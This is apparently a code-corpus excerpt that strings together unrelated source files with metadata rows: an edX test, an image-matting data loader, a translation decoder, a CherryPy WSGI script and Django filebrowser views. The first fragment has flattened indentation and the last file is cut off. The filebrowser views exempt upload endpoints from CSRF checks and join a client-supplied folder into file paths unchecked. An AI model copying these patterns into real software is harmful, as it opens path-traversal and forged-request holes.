with open(path) as f:
instructions = json.loads(f.read(), object_pairs_hook=OrderedDict)
        do_upgrade(instructions, None)
p = re.compile('[0-4]000-0001')
for id in saved_journals:
j = models.Journal.pull(id)
bj = j.bibjson()
pissn = bj.get_one_identifier(bj.P_ISSN)
if not p.match(pissn):
assert bj.title == "Test Journal"
assert j.last_updated == saved_journals[j.id]
else:
assert bj.title == "Updated Title"
assert not j.last_updated == saved_journals[j.id]
|
apache-2.0
| 5,705,412,087,984,378,000
| 27.506329
| 85
| 0.567496
| false
| 3.48068
| true
| false
| false
|
ESOedX/edx-platform
|
openedx/core/djangoapps/schedules/management/commands/tests/test_send_course_update.py
|
1
|
4396
|
"""
Tests for send_course_update management command.
"""
from __future__ import absolute_import
from unittest import skipUnless
import ddt
from django.conf import settings
from edx_ace.utils.date import serialize
from mock import patch
from six.moves import range
from openedx.core.djangoapps.schedules import resolvers, tasks
from openedx.core.djangoapps.schedules.config import COURSE_UPDATE_WAFFLE_FLAG
from openedx.core.djangoapps.schedules.management.commands import send_course_update as nudge
from openedx.core.djangoapps.schedules.management.commands.tests.send_email_base import (
ExperienceTest,
ScheduleSendEmailTestMixin
)
from openedx.core.djangoapps.schedules.management.commands.tests.upsell_base import ScheduleUpsellTestMixin
from openedx.core.djangoapps.schedules.models import ScheduleExperience
from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag
from openedx.core.djangolib.testing.utils import skip_unless_lms
from student.tests.factories import CourseEnrollmentFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
@ddt.ddt
@skip_unless_lms
@skipUnless(
'openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed",
)
class TestSendCourseUpdate(ScheduleUpsellTestMixin, ScheduleSendEmailTestMixin, ModuleStoreTestCase):
__test__ = True
# pylint: disable=protected-access
resolver = resolvers.CourseUpdateResolver
task = tasks.ScheduleCourseUpdate
deliver_task = tasks._course_update_schedule_send
command = nudge.Command
deliver_config = 'deliver_course_update'
enqueue_config = 'enqueue_course_update'
expected_offsets = list(range(-7, -77, -7))
experience_type = ScheduleExperience.EXPERIENCES.course_updates
queries_deadline_for_each_course = True
def setUp(self):
super(TestSendCourseUpdate, self).setUp()
self.highlights_patcher = patch('openedx.core.djangoapps.schedules.resolvers.get_week_highlights')
mock_highlights = self.highlights_patcher.start()
mock_highlights.return_value = [u'Highlight {}'.format(num + 1) for num in range(3)]
self.addCleanup(self.stop_highlights_patcher)
def stop_highlights_patcher(self):
"""
Stops the patcher for the get_week_highlights method
if the patch is still in progress.
"""
if self.highlights_patcher is not None:
self.highlights_patcher.stop()
@ddt.data(
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.default, offset=expected_offsets[0], email_sent=False),
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.course_updates, offset=expected_offsets[0], email_sent=True),
ExperienceTest(experience=None, offset=expected_offsets[0], email_sent=False),
)
def test_schedule_in_different_experience(self, test_config):
self._check_if_email_sent_for_experience(test_config)
@override_waffle_flag(COURSE_UPDATE_WAFFLE_FLAG, True)
@patch('openedx.core.djangoapps.schedules.signals.get_current_site')
def test_with_course_data(self, mock_get_current_site):
self.highlights_patcher.stop()
self.highlights_patcher = None
mock_get_current_site.return_value = self.site_config.site
course = CourseFactory(highlights_enabled_for_messaging=True, self_paced=True)
with self.store.bulk_operations(course.id):
ItemFactory.create(parent=course, category='chapter', highlights=[u'highlights'])
enrollment = CourseEnrollmentFactory(course_id=course.id, user=self.user, mode=u'audit')
self.assertEqual(enrollment.schedule.get_experience_type(), ScheduleExperience.EXPERIENCES.course_updates)
_, offset, target_day, _ = self._get_dates(offset=self.expected_offsets[0])
enrollment.schedule.start = target_day
enrollment.schedule.save()
with patch.object(tasks, 'ace') as mock_ace:
self.task().apply(kwargs=dict(
site_id=self.site_config.site.id,
target_day_str=serialize(target_day),
day_offset=offset,
bin_num=self._calculate_bin_for_user(enrollment.user),
))
self.assertTrue(mock_ace.send.called)
|
agpl-3.0
| -5,302,609,191,891,175,000
| 42.96
| 126
| 0.734531
| false
| 3.835951
| true
| false
| false
|
PetroWu/AutoPortraitMatting
|
portrait.py
|
1
|
8570
|
import numpy as np
import scipy.io as sio
import os
from PIL import Image
class BatchDatset:
imgs = []
max_batch = 0
batch_size = 0
cur_imgs = []
cur_labels = []
cur_batch = 0 # index of batch generated
cur_ind = 0 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['trainlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
self.cur_imgs, self.cur_labels = self.get_variations(self.imgs[0])
def next_batch(self):
while len(self.cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_imgs, tmp_labels = self.get_variations(cur_name)
self.cur_imgs += tmp_imgs
self.cur_labels += tmp_labels
if len(self.cur_imgs) >= self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = self.cur_imgs.pop(0)
ramat[i, :, :, 0] = self.cur_labels.pop(0)
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat
return [], []
def get_variations(self, img_name):
imgs = []
labels = []
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
imgs.append(nimat)
labels.append(namat)
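            # Data augmentation: four rotated copies plus four gamma-corrected
            # copies, i.e. nine variants per source image (hence the commented
            # "* 9" in __init__ above).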
angs = [-45, -22, 22, 45]
gammas = [0.8, 0.9, 1.1, 1.2]
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
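            # Undo the stored normalisation: the .mat images are BGR, scaled by
            # 1/255 and zero-centred with the channel means 104.008/116.669/122.675
            # (the usual VGG/Caffe ImageNet means), so rebuild an RGB uint8 image
            # for PIL.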
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
i_img = Image.fromarray(np.uint8(org_mat))
a_img = Image.fromarray(np.uint8(amat))
for i in range(4):
tmpi_img = i_img.rotate(angs[i])
tmpa_img = a_img.rotate(angs[i])
tmpri_img = np.array(tmpi_img, dtype=np.int)
rimat = np.zeros(tmpri_img.shape, dtype=np.float)
for k in range(h):
for j in range(w):
rimat[k][j][0] = (tmpri_img[k][j][2] * 1.0 - 104.008) / 255
rimat[k][j][1] = (tmpri_img[k][j][1] * 1.0 - 116.669) / 255
rimat[k][j][2] = (tmpri_img[k][j][0] * 1.0 - 122.675) / 255
imgs.append(rimat)
labels.append(np.array(tmpa_img, dtype=np.int))
tmp_nimat = np.array(imat, dtype=np.float)
tmp_nimat[:, :, 0] = tmp_nimat[:, :, 0] * 255 + 104.01
tmp_nimat[:, :, 0] = (pow(tmp_nimat[:, :, 0], gammas[i]) - pow(104.01, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 1] = tmp_nimat[:, :, 1] * 255 + 116.67
tmp_nimat[:, :, 1] = (pow(tmp_nimat[:, :, 1], gammas[i]) - pow(116.67, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 2] = tmp_nimat[:, :, 2] * 255 + 122.68
tmp_nimat[:, :, 2] = (pow(tmp_nimat[:, :, 2], gammas[i]) - pow(122.68, gammas[i])) / pow(255, gammas[i])
imgs.append(tmp_nimat)
labels.append(namat)
return imgs, labels
class TestDataset:
imgs = []
max_batch = 0
batch_size = 0
cur_batch = 0 # index of batch generated
cur_ind = -1 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['testlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
#self.cur_imgs, self.cur_labels = self.get_images(self.imgs[0])
def next_batch(self):
cur_imgs = []
cur_labels = []
cur_orgs = []
while len(cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_img, tmp_label, tmp_org = self.get_images(cur_name)
if tmp_img is not None:
cur_imgs.append(tmp_img)
cur_labels.append(tmp_label)
cur_orgs.append(tmp_org)
if len(cur_imgs) == self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
org_mat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.int)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = cur_imgs.pop(0)
org_mat[i] = cur_orgs.pop(0)
ramat[i, :, :, 0] = cur_labels.pop(0)
#print('getting', ramat[0, 200:210, 200:220])
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat, org_mat
return [], [], []
def get_images(self, img_name):
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
return nimat, namat, org_mat
return None, None, None
if __name__ == '__main__':
data = BatchDatset('data/trainlist.mat')
'''ri, ra = data.next_batch()
while len(ri) != 0:
ri, ra = data.next_batch()
print(np.sum(ra))'''
imgs, labels = data.get_variations(47)
cnt = 0
for img in imgs:
mat = np.zeros(img.shape, dtype=np.int)
h, w, _ = img.shape
for i in range(h):
for j in range(w):
mat[i][j][0] = round(img[i][j][2] * 255 + 122.675)
mat[i][j][1] = round(img[i][j][1] * 255 + 116.669)
mat[i][j][2] = round(img[i][j][0] * 255 + 104.008)
im = Image.fromarray(np.uint8(mat))
im.save('img-'+str(cnt)+'.jpg')
cnt += 1
|
apache-2.0
| 5,070,734,809,259,799,000
| 42.72449
| 149
| 0.502684
| false
| 3.046569
| false
| false
| false
|
query/mt-submissions
|
hw2-decoding/decode.py
|
1
|
7691
|
#!/usr/bin/env python
"""A translation decoder."""
from collections import defaultdict, namedtuple
import models
Hypothesis = namedtuple('Hypothesis',
['logprob', 'future_cost', 'coverage',
'lm_state', 'predecessor', 'candidate'])
def decode(tm, lm, source_sentence,
stack_size=1, max_reordering=None):
"""Return the most probable decoding of *source_sentence* under the
provided probabilistic translation and language models."""
# Compute the future cost table.
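    # future_costs[(i, j)] estimates the best log-probability achievable for
    # translating source_sentence[i:j]; longer spans combine shorter ones by
    # taking the best split point (standard phrase-based future-cost
    # estimation).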
future_costs = {}
for segment_length in xrange(1, len(source_sentence) + 1):
for start in xrange(len(source_sentence) - segment_length + 1):
end = start + segment_length
future_costs[(start, end)] = float('-inf')
candidates = tm.get(source_sentence[start:end], [])
if candidates:
logprob = candidates[0].logprob
lm_state = tuple()
for target_word in candidates[0].english.split():
lm_state, word_logprob = lm.score(lm_state, target_word)
logprob += word_logprob
future_costs[(start, end)] = logprob
for mid in xrange(start + 1, end):
future_costs[(start, end)] = max(
future_costs[(start, mid)] + future_costs[(mid, end)],
future_costs[(start, end)])
# Actually start decoding.
initial = Hypothesis(0.0, future_costs[(0, len(source_sentence))],
(False,) * len(source_sentence),
lm.begin(), None, None)
# We add 1 here because we need to have stacks for both ends: 0 and
# len(source_sentence).
stacks = [{} for _ in xrange(len(source_sentence) + 1)]
stacks[0][lm.begin()] = initial
# Iterate over every stack but the last. It's not possible to add
# anything to a hypothesis in the last stack anyway, so we skip it.
for i, stack in enumerate(stacks[:-1]):
# Take only the best *stack_size* hypotheses. Using the sum of
# the log-probability and the future cost negatively impacts the
# model score (??).
hypotheses = sorted(stack.itervalues(),
key=lambda h: -h.logprob)[:stack_size]
for hypothesis in hypotheses:
# Save ourselves a couple of levels of indentation later on.
def untranslated_segments():
if max_reordering is None:
starts = xrange(len(source_sentence))
else:
starts = xrange(min(i + max_reordering,
len(source_sentence)))
for start in starts:
if hypothesis.coverage[start]:
continue
ends = xrange(start, len(source_sentence))
for end in ends:
if hypothesis.coverage[end]:
break
yield (start, end + 1)
# Iterate over blocks of untranslated source words.
for start, end in untranslated_segments():
source_phrase = source_sentence[start:end]
# Get all of the potential candidate translations.
candidates = tm.get(source_phrase, [])
# Translate unknown unigrams to themselves.
if not candidates and len(source_phrase) == 1:
candidates.append(models.phrase(source_phrase[0], 0.0))
for candidate in candidates:
logprob = hypothesis.logprob + candidate.logprob
# Make a new coverage vector with the appropriate
# elements set to True. This isn't pretty. Sorry.
coverage = (hypothesis.coverage[:start] +
(True,) * (end - start) +
hypothesis.coverage[end:])
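                    # e.g. (False, False, True, False) with start=0, end=2
                    # becomes (True, True, True, False).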
# Find the future cost estimate for this hypothesis
# by summing over contiguous incomplete segments.
future_cost = 0.0
cost_start = None
for cost_i, covered in enumerate(coverage + (True,)):
if covered:
if cost_start is not None:
future_cost += \
future_costs[(cost_start, cost_i)]
cost_start = None
else:
if cost_start is None:
cost_start = cost_i
# Make a new LM state.
lm_state = hypothesis.lm_state
for target_word in candidate.english.split():
lm_state, word_logprob = \
lm.score(lm_state, target_word)
logprob += word_logprob
# Add the final transition probability if the end of
# this segment is also the end of the sentence.
if end == len(source_sentence):
logprob += lm.end(lm_state)
# If the new hypothesis is the best hypothesis for
# its state and number of completed words, push it
# onto the stack, replacing any that is present.
completed = sum(int(x) for x in coverage)
if (lm_state not in stacks[completed] or
(stacks[completed][lm_state].logprob +
stacks[completed][lm_state].future_cost) <
logprob + future_cost):
stacks[completed][lm_state] = Hypothesis(
logprob, future_cost, coverage,
lm_state, hypothesis, candidate)
# We don't need to specify a key, since we're looking for the best
# log-probability, and that's the first element of a hypothesis.
best = max(stacks[-1].itervalues())
current = best
decoding = []
while current.candidate:
decoding.insert(0, current.candidate.english)
current = current.predecessor
return tuple(decoding)
def main():
import argparse
parser = argparse.ArgumentParser(
description='A translation decoder.')
parser.add_argument(
'tm_path', metavar='TM',
help='path to translation model')
parser.add_argument(
'lm_path', metavar='LM',
help='path to language model')
parser.add_argument(
'input_file', metavar='INPUT', type=argparse.FileType('r'),
help='path to file containing sentences to decode')
parser.add_argument(
'-k', '--max-candidates', type=int, default=1,
help='maximum number of translation candidates to consider for '
'each phrase')
parser.add_argument(
'-r', '--max-reordering', type=int,
help='maximum number of source words that can be skipped '
'during reordering')
parser.add_argument(
'-s', '--stack-size', type=int, default=1,
help='maximum hypothesis stack size')
args = parser.parse_args()
tm = models.TM(args.tm_path, args.max_candidates)
lm = models.LM(args.lm_path)
for source_line in args.input_file:
source_sentence = tuple(source_line.split())
print ' '.join(decode(tm, lm, source_sentence,
stack_size=args.stack_size,
max_reordering=args.max_reordering))
if __name__ == '__main__':
main()
|
mit
| -7,950,587,443,624,482,000
| 45.896341
| 76
| 0.52854
| false
| 4.718405
| false
| false
| false
|
paolodoz/timesheet
|
embedded/modwsgi.py
|
1
|
1518
|
#!/usr/bin/env python
import cherrypy, logging
import sys, os, atexit
# Suppose this file in
installation_path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, installation_path)
from core.routes.routes import Routes
from core.config import conf_server, conf_static, conf_logging
def secureheaders():
headers = cherrypy.response.headers
headers['X-Frame-Options'] = 'DENY'
headers['X-XSS-Protection'] = '1; mode=block'
headers['Content-Security-Policy'] = "default-src='self'"
# Update configurations
# If log paths are absolute, move to current path
if not os.path.isabs(conf_server['log.access_file']):
conf_server['log.access_file'] = os.path.join(installation_path, conf_server['log.access_file'])
if not os.path.isabs(conf_server['log.error_file']):
conf_server['log.error_file'] = os.path.join(installation_path, conf_server['log.error_file'])
conf_server['environment'] = 'embedded'
cherrypy.config.update(conf_server)
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
for logname, loglevel in conf_logging.items():
logging_level = getattr(logging, loglevel)
cherrypy_log = getattr(cherrypy.log, logname)
cherrypy_log.setLevel(logging_level)
cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)
routes = Routes()
application = cherrypy.Application(routes, config=conf_static)
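# Hedged deployment sketch for mod_wsgi (paths are hypothetical):
#
#     WSGIDaemonProcess timesheet python-path=/opt/timesheet
#     WSGIScriptAlias /timesheet /opt/timesheet/embedded/modwsgi.py
#
# mod_wsgi imports this module and serves the `application` object above.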
|
gpl-2.0
| -6,801,214,810,711,781,000
| 35.142857
| 100
| 0.732543
| false
| 3.411236
| false
| false
| false
|
dwaiter/django-filebrowser-old
|
filebrowser/views.py
|
1
|
19478
|
# coding: utf-8
# general imports
import itertools, os, re
from time import gmtime, strftime
# django imports
from django.shortcuts import render_to_response, HttpResponse
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.conf import settings
from django import forms
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured
from django.dispatch import Signal
from django.core.paginator import Paginator, InvalidPage, EmptyPage
try:
# django SVN
from django.views.decorators.csrf import csrf_exempt
except:
# django 1.1
from django.contrib.csrf.middleware import csrf_exempt
# filebrowser imports
from filebrowser.settings import *
from filebrowser.functions import path_to_url, sort_by_attr, get_path, get_file, get_version_path, get_breadcrumbs, get_filterdate, get_settings_var, handle_file_upload, convert_filename
from filebrowser.templatetags.fb_tags import query_helper
from filebrowser.base import FileObject
from filebrowser.decorators import flash_login_required
# Precompile regular expressions
filter_re = []
for exp in EXCLUDE:
filter_re.append(re.compile(exp))
for k,v in VERSIONS.iteritems():
    exp = (r'_%s\.(%s)') % (k, '|'.join(EXTENSION_LIST))  # escape the dot so only real extensions match
filter_re.append(re.compile(exp))
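# Together, filter_re excludes both user-configured EXCLUDE patterns and
# generated version files of the form "<name>_<version>.<ext>", so only
# original files are listed.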
def browse(request):
"""
Browse Files/Directories.
"""
# QUERY / PATH CHECK
query = request.GET.copy()
path = get_path(query.get('dir', ''))
directory = get_path('')
q = request.GET.get('q')
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
if directory is None:
# The DIRECTORY does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured, _("Error finding Upload-Folder. Maybe it does not exist?")
redirect_url = reverse("fb_browse") + query_helper(query, "", "dir")
return HttpResponseRedirect(redirect_url)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'images_total': 0, 'select_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
if q:
m_root = os.path.normpath(MEDIA_ROOT)
dirs = [
[(os.path.normpath(root)[len(m_root)+1:], f) for f in filenames]
for root, _subdirs, filenames in os.walk(abs_path)
]
dir_list = itertools.chain(*dirs)
else:
root = os.path.join(DIRECTORY, path)
dir_list = ((root, f) for f in os.listdir(abs_path))
files = []
for file_dir, file in dir_list:
# EXCLUDE FILES MATCHING VERSIONS_PREFIX OR ANY OF THE EXCLUDE PATTERNS
filtered = file.startswith('.')
for re_prefix in filter_re:
if re_prefix.search(file):
filtered = True
if filtered:
continue
results_var['results_total'] += 1
# CREATE FILEOBJECT
fileobject = FileObject(os.path.join(file_dir, file))
# FILTER / SEARCH
append = False
if fileobject.filetype == request.GET.get('filter_type', fileobject.filetype) and get_filterdate(request.GET.get('filter_date', ''), fileobject.date or 0):
append = True
if q and not re.compile(q.lower(), re.M).search(file.lower()):
append = False
# APPEND FILE_LIST
if append:
try:
# COUNTER/RESULTS
if fileobject.filetype == 'Image':
results_var['images_total'] += 1
if fileobject.filetype != 'Folder':
results_var['delete_total'] += 1
elif fileobject.filetype == 'Folder' and fileobject.is_empty:
results_var['delete_total'] += 1
if query.get('type') and query.get('type') in SELECT_FORMATS and fileobject.filetype in SELECT_FORMATS[query.get('type')]:
results_var['select_total'] += 1
elif not query.get('type'):
results_var['select_total'] += 1
except OSError:
# Ignore items that have problems
continue
else:
files.append(fileobject)
results_var['results_current'] += 1
# COUNTER/RESULTS
if fileobject.filetype:
counter[fileobject.filetype] += 1
# SORTING
query['o'] = request.GET.get('o', DEFAULT_SORTING_BY)
query['ot'] = request.GET.get('ot', DEFAULT_SORTING_ORDER)
folders = [f for f in files if f.filetype == 'Folder']
folders = sort_by_attr(folders, 'filename')
files = [f for f in files if f.filetype != 'Folder']
files = sort_by_attr(files, request.GET.get('o', DEFAULT_SORTING_BY))
if not request.GET.get('ot') and DEFAULT_SORTING_ORDER == "desc" or request.GET.get('ot') == "desc":
files.reverse()
p = Paginator(files, LIST_PER_PAGE)
try:
page_nr = request.GET.get('p', '1')
except:
page_nr = 1
try:
page = p.page(page_nr)
except (EmptyPage, InvalidPage):
page = p.page(p.num_pages)
return render_to_response('filebrowser/index.html', {
'dir': path,
'p': p,
'q': q,
'page': page,
'folders': folders,
'results_var': results_var,
'counter': counter,
'query': query,
'title': _(u'FileBrowser'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
}, context_instance=Context(request))
browse = staff_member_required(never_cache(browse))
# mkdir signals
filebrowser_pre_createdir = Signal(providing_args=["path", "dirname"])
filebrowser_post_createdir = Signal(providing_args=["path", "dirname"])
def mkdir(request):
"""
Make Directory.
"""
from filebrowser.forms import MakeDirForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
if request.method == 'POST':
form = MakeDirForm(abs_path, request.POST)
if form.is_valid():
server_path = os.path.join(abs_path, form.cleaned_data['dir_name'])
try:
# PRE CREATE SIGNAL
filebrowser_pre_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# CREATE FOLDER
os.mkdir(server_path)
os.chmod(server_path, 0775)
# POST CREATE SIGNAL
filebrowser_post_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# MESSAGE & REDIRECT
msg = _('The Folder %s was successfully created.') % (form.cleaned_data['dir_name'])
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
# remove filter in order to actually _see_ the new folder
# remove pagination
redirect_url = reverse("fb_browse") + query_helper(query, "ot=desc,o=date", "ot,o,filter_type,filter_date,q,p")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating folder.')])
else:
form = MakeDirForm(abs_path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'title': _(u'New Folder'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'New Folder')
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request):
"""
    Multiple File Upload.
"""
from django.http import parse_cookie
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# SESSION (used for flash-uploading)
cookie_dict = parse_cookie(request.META.get('HTTP_COOKIE', ''))
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
session_key = cookie_dict.get(settings.SESSION_COOKIE_NAME, None)
return render_to_response('filebrowser/upload.html', {
'query': query,
'title': _(u'Select files to upload'),
'settings_var': get_settings_var(),
'session_key': session_key,
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Upload')
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
@csrf_exempt
def _check_file(request):
"""
Check if file already exists on the server.
"""
from django.utils import simplejson
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
fileArray = {}
if request.method == 'POST':
for k,v in request.POST.items():
if k != "folder":
v = convert_filename(v)
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, v)):
fileArray[k] = v
return HttpResponse(simplejson.dumps(fileArray))
# upload signals
filebrowser_pre_upload = Signal(providing_args=["path", "file"])
filebrowser_post_upload = Signal(providing_args=["path", "file"])
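# Hedged usage sketch: other apps can react to uploads via Django's signal
# API (receiver name and body below are illustrative):
#
# def on_post_upload(sender, path, file, **kwargs):
#     pass  # e.g. scan or post-process the uploaded FileObject
# filebrowser_post_upload.connect(on_post_upload)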
@csrf_exempt
@flash_login_required
def _upload_file(request):
"""
Upload file to the server.
"""
from django.core.files.move import file_move_safe
if request.method == 'POST':
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, folder)
if request.FILES:
filedata = request.FILES['Filedata']
filedata.name = convert_filename(filedata.name)
# PRE UPLOAD SIGNAL
filebrowser_pre_upload.send(sender=request, path=request.POST.get('folder'), file=filedata)
# HANDLE UPLOAD
uploadedfile = handle_file_upload(abs_path, filedata)
# MOVE UPLOADED FILE
# if file already exists
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, filedata.name)):
old_file = os.path.join(abs_path, filedata.name)
new_file = os.path.join(abs_path, uploadedfile)
file_move_safe(new_file, old_file)
# POST UPLOAD SIGNAL
filebrowser_post_upload.send(sender=request, path=request.POST.get('folder'), file=FileObject(os.path.join(DIRECTORY, folder, filedata.name)))
return HttpResponse('True')
#_upload_file = flash_login_required(_upload_file)
# delete signals
filebrowser_pre_delete = Signal(providing_args=["path", "filename"])
filebrowser_post_delete = Signal(providing_args=["path", "filename"])
def delete(request):
"""
Delete existing File/Directory.
When trying to delete a Directory, the Directory has to be empty.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
msg = ""
if request.GET:
if request.GET.get('filetype') != "Folder":
relative_server_path = os.path.join(DIRECTORY, path, filename)
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# DELETE FILE
os.unlink(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
            except OSError:
                msg = _('Error deleting the file.')
else:
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE FOLDER
os.rmdir(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The folder %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
            except OSError:
                msg = _('Error deleting the folder.')
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
        'dir': path,
'file': request.GET.get('filename', ''),
'query': query,
'settings_var': get_settings_var(),
        'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
